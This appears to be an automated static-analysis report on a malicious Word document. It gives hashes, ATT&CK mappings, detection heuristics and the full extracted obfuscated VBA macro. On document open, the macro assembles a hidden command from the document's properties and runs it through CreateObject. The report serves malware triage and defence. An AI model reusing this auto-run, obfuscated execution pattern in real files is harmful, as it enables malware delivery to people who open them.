Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 95e8557b77f64be5…

MALICIOUS

Office (OOXML)

52.7 KB Created: 2020-12-02 02:49:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2026-06-04
MD5: ba8413ec5d573aa045b5c989dcd4804e SHA-1: e0b6a3357d5c09c12ffdbdceb8bb6020d8b6fa0e SHA-256: 95e8557b77f64be520617d321763a80e49e38e9ffab5692d25ce9ea2b030a83b
112 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing a VBA macro that automatically executes via the Document_Open subroutine. The macro utilizes CreateObject and appears to be heavily obfuscated, suggesting an intent to download and execute a secondary payload. The presence of a Document_Open macro and CreateObject call are strong indicators of malicious intent, commonly seen in macro-based malware.

Heuristics 6

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject(osJsmKJzfGJP).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6619 bytes
SHA-256: 0e1cf4849ca812ec5b8d45aa54dc4dd6fbc93ec40e42d1de68bada9ba25db58a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
76 of 120 identifiers look randomly generated (e.g. 'DxxjIHtIIMPNc') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    DqwIddXugwNj
End Sub
Function yKvCXNf(vRKbufsX)
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
     LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
     MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
     WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
     XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
     KADXEmH = ActiveDocument.CustomDocumentProperties(vRKbufsX)
     yKvCXNf = KADXEmH
     YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
     LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
     MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
     WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
     XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Function mRfpfKhGSD()
    mCzGYYaxRLX = 8385
    Dim MCGPUwUZMWy(8385)
    caMKKbnBu = ("rFNuCnmpUU")
     ALKNUwLcpPu = ("SLCZxtuyhF")
     MczvCeNBH = ("XLSHkERKtnR")
     MCGPUwUZMWy(7904) = UcwcACY
     MCGPUwUZMWy(2787) = rbUkPum
     MCGPUwUZMWy(684) = 7163 + 811 + 710 / 7663 / 5363 / 1108 - 3395 - 7739 + 4644 + 8393 + 9078
     MCGPUwUZMWy(1867) = KwvDMWrrG
     MCGPUwUZMWy(1721) = LzkZWpB
     MCGPUwUZMWy(7960) = 8725
     MCGPUwUZMWy(8262) = 7312
     MCGPUwUZMWy(6212) = 8270
     MCGPUwUZMWy(298) = ZUpymUKM
     MCGPUwUZMWy(3896) = 954 + 9998 / 9266 / 6580 - 736 - 883 + 2313 + 1188 + 5675
      For mCzGYYaxRLX = 7999 To 5163
    MCGPUwUZMWy(mCzGYYaxRLX) = mCzGYYaxRLX
    Next
    KAyYxEHgrP = MCGPUwUZMWy(3814) + MCGPUwUZMWy(8385)
     ZBXEkbtP = MCGPUwUZMWy(3170) + MCGPUwUZMWy(1765) + MCGPUwUZMWy(8385)
End Function
Sub DqwIddXugwNj()
    mRfpfKhGSD
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    gHXrdcyrg
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    osJsmKJzfGJP = yKvCXNf("ttiIemVErw") + yKvCXNf("gAevmjiJlO") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + "." + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("RUMyrHTBVP") + drgLHvTZD + RzsFTKsMa
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    DxxjIHtIIMPN = yKvCXNf("qERbRhbUQE") + yKvCXNf("RUMyrHTBVP") + NBhWRnnr + nGmERhbgD + yKvCXNf("BXpvaFjLUP") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + GZnvfVd
    DxxjIHtIIMPNc = qbxGDawevX.gZakiPWhOV
    mNaCbmDx = DxxjIHtIIMPN + " " + DxxjIHtIIMPNc + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
    CreateObject(osJsmKJzfGJP).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Sub


Public Function VKbZcLUg()
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    DEBAKSwY = yKvCXNf("ankMNxSvDuv") + yKvCXNf("fDaHszez") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("kfShLKvtYaW") + yKvCXNf("drgLHvTZD") + yKvCXNf("RzsFTKsMa")
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    ZneZkvTk = yKvCXNf("PpRDVaYk") + yKvCXNf("SnVfbyV") + yKvCXNf("NBhWRnnr") + yKvCXNf("nGmERhbgD") + yKvCXNf("MHmBmVtxxeD") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("GZnvfVd")
    mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
    CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
 End Function
 
Function gHXrdcyrg()
    WavCCbxD = 8004
    Dim EhAUrkkxwMG(8004)
    naRAuCU = ("vgaYmNPnVX")
     EhAUrkkxwMG(2991) = eNECkccF
     EhAUrkkxwMG(6466) = FbcdBnKRuK
     EhAUrkkxwMG(3066) = kfEeTmdvHNy
     EhAUrkkxwMG(3977) = vLuXaKtP
     EhAUrkkxwMG(2869) = 4459 + 146 + 7490 / 9816 - 7410 - 8463 - 2553 + 451 + 8893
     EhAUrkkxwMG(5881) = mtpNLGb
     EhAUrkkxwMG(5248) = gfxcZDpkv
     EhAUrkkxwMG(2458) = SsvSpWe
     EhAUrkkxwMG(458) = AVUPYHGfC
     EhAUrkkxwMG(4552) = 198
     EhAUrkkxwMG(5266) = XvRCbwhh
     EhAUrkkxwMG(4843) = eXHbUGY
     EhAUrkkxwMG(6934) = dHZNEDyDcv
     EhAUrkkxwMG(4138) = MvYmwSeRUT
     EhAUrkkxwMG(6033) = 8623 + 2405 / 7340 / 2292 - 2848 - 4607 + 3843 + 888 + 8671
      For WavCCbxD = 830 To 4845
    EhAUrkkxwMG(WavCCbxD) = WavCCbxD
    Next
    PHZLUddDVam = EhAUrkkxwMG(7146) + EhAUrkkxwMG(7682) + EhAUrkkxwMG(122) + EhAUrkkxwMG(417) + EhAUrkkxwMG(4616) + EhAUrkkxwMG(1498) + EhAUrkkxwMG(8004)
End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "qbxGDawevX"
Attribute VB_Base = "0{A68EF772-A757-4BB8-8985-B203CDD06A2D}{E0A0B256-F47C-470C-9299-1D9722C80184}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 64cfd1b9d71278ef0cef9b129e2aadf256866ded3df286c2346a59ca66906e94
Detection
ClamAV: No threats found
Obfuscation or payload: likely
211 of 371 identifiers look randomly generated (e.g. 'A9ABB1C7B5C7B5C7B5C7B5') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.